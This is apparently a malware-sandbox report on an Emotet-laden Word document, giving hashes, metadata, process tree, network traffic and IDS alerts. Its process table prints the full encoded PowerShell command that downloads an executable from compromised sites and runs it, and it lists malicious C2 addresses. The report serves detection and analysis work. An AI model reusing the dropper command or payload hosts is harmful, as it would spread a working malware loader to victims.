File name: | 20190212_839295.doc |
Full analysis: | https://app.any.run/tasks/2ff365ba-4eea-467b-af15-862eb31b1655 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 02, 2019, 18:31:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ea officia error., Author: Veronika Bussmann, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 2 13:11:00 2019, Last Saved Time/Date: Mon Dec 2 13:11:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 331, Security: 0 |
MD5: | E4A897E568D54DD68EE1CE96D3BD5E09 |
SHA1: | C0DAA2D60ADE04A32483D2FCA32027C96E671B6E |
SHA256: | 1B9B07F95AF4CE8F153E2076333B0038559113286BECB4E1A18D904124F79FB1 |
SSDEEP: | 6144:rxo6ktJfob0DK2k44tGiL3HJkiyD7bcS8quadr:rxo6ktJfob0DKVQitk97bcJq9dr |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Forms 2.0 Form |
---|---|
CompObjUserTypeLen: | 25 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 388 |
Paragraphs: | 1 |
Lines: | 2 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 331 |
Words: | 58 |
Pages: | 1 |
ModifyDate: | 2019:12:02 13:11:00 |
CreateDate: | 2019:12:02 13:11:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Veronika Bussmann |
Subject: | - |
Title: | Ea officia error. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2580 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\20190212_839295.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2108 | powershell -w hidden -en JABDAHAAegB0AHgAaQBpAHQAYwB1AGwAbgB2AD0AJwBYAGcAegBnAGcAawBsAHcAegBnACcAOwAkAFYAZwBpAGkAbwB4AHYAZwBsAHYAdQBrACAAPQAgACcANQA3ADQAJwA7ACQAWgBwAHAAdgB6AHkAdQBuAGkAawBiAD0AJwBDAGQAbwB3AGEAYwB6AHgAbwBvACcAOwAkAEwAagBmAHAAdgB4AGQAaQBlAHoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFYAZwBpAGkAbwB4AHYAZwBsAHYAdQBrACsAJwAuAGUAeABlACcAOwAkAEoAbAByAHQAYQBuAGoAbgA9ACcATgBmAHEAbwB3AGIAdgBvAHYAeQByAHYAJwA7ACQAVQBwAHEAZAB1AHYAZwBvAGsAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQBUAC4AdwBlAEIAQwBMAEkAZQBOAHQAOwAkAEQAbgBlAHIAZAByAHQAbQA9ACcAaAB0AHQAcAA6AC8ALwBzAHIAaQBnAGwAbwBiAGEAbABpAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGsAZQAvACoAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AMgA0ADEAbwBwAHQAaQBjAGEAbAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AOQBMAHkASgBmAEgASABrAGcAWgAvACoAaAB0AHQAcABzADoALwAvAGIAdQB0AGkAawBwAGEAdABpAGsAZQAuAGMAbwBtAC8AbwBsAGQALwB4AHcAbAAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AdABoAGEAaQBuAGUAdABtAGUAZABpAGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGgAMwAvACoAaAB0AHQAcABzADoALwAvAGIAbABvAGcALgBsAGUAYQByAG4AYwB5AC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdABoAGUAbQBlAHMALwBzAGEAbABpAGUAbgB0AC8AbgBlAGMAdABhAHIALwBwAGwAdQBnAGkAbgAtAG4AbwB0AGkAYwBlAHMALwBsADEAbgBNADkANABYAGUAdwAvACcALgAiAFMAcABgAEwASQB0ACIAKAAnACoAJwApADsAJABJAGQAZwBtAHYAcgBrAGEAdQA9ACcATgBkAHUAaQB4AHMAYwByAGkAcQBqACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAGUAYQBnAHIAZgBoAHUAbQBxACAAaQBuACAAJABEAG4AZQByAGQAcgB0AG0AKQB7AHQAcgB5AHsAJABVAHAAcQBkAHUAdgBnAG8AawAuACIAZABvAFcAYABOAGAAbABPAGAAQQBEAEYASQBMAGUAIgAoACQAWgBlAGEAZwByAGYAaAB1AG0AcQAsACAAJABMAGoAZgBwAHYAeABkAGkAZQB6ACkAOwAkAEYAeQBiAHoAdAB3AG0AbwBlAGsAPQAnAEgAdwByAGIAagBtAGsAegB5AGoAeQBiAGYAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABMAGoAZgBwAHYAeABkAGkAZQB6ACkALgAiAEwAYABFAE4AZwBgAFQASAAiACAALQBnAGUAIAAzADgAMwA2ADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGAAQQByAFQAIgAoACQATABqAGYAcAB2AHgAZABpAGUAegApADsAJABEAHkAcQB6AHgAdABoAHgAcQBsAGgAPQAnAEEAagBzAGsAbABxAHcAbABxACcAOwBiAHIAZQBhAGsAOwAkAFkAZgBuAHYAYQBhAHUAdgByAD0AJwBGAHQAawB6AG4AbwB1AGwAeABlACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFgAYQBmAHEAdQBoAGoAZABuAHoAbABiAD0AJwBNAHgAcQByAG0AZwBnAHEAZAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2696 | "C:\Users\admin\574.exe" | C:\Users\admin\574.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: DLGSMPL MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
656 | --8328bcf0 | C:\Users\admin\574.exe | 574.exe | |
User: admin Integrity Level: MEDIUM Description: DLGSMPL MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2912 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 574.exe |
User: admin Integrity Level: MEDIUM Description: DLGSMPL MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2924 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | |
User: admin Integrity Level: MEDIUM Description: DLGSMPL MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7B4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB98ED0C.wmf | — | |
MD5:— | SHA256:— | |||
2580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CB62D19D.wmf | — | |
MD5:— | SHA256:— | |||
2580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2BDE32FA.wmf | — | |
MD5:— | SHA256:— | |||
2580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD0232B3.wmf | — | |
MD5:— | SHA256:— | |||
2580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CCAE518.wmf | — | |
MD5:— | SHA256:— | |||
2580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCED3239.wmf | — | |
MD5:— | SHA256:— | |||
2580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19F42E6.wmf | — | |
MD5:— | SHA256:— | |||
2580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\123409AF.wmf | — | |
MD5:— | SHA256:— | |||
2580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A9737E4.wmf | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2924 | serialfunc.exe | POST | — | 212.186.191.177:80 | http://212.186.191.177/jhOQql1aRN2iCAlBuwB | AT | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2924 | serialfunc.exe | 91.242.138.5:80 | — | Visovision S.l. | ES | malicious |
2924 | serialfunc.exe | 212.186.191.177:80 | — | Liberty Global Operations B.V. | AT | malicious |
2108 | powershell.exe | 66.96.147.117:80 | sriglobalit.com | The Endurance International Group, Inc. | US | malicious |
Domain | IP | Reputation |
---|---|---|
sriglobalit.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2108 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
2108 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2108 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2108 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2108 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |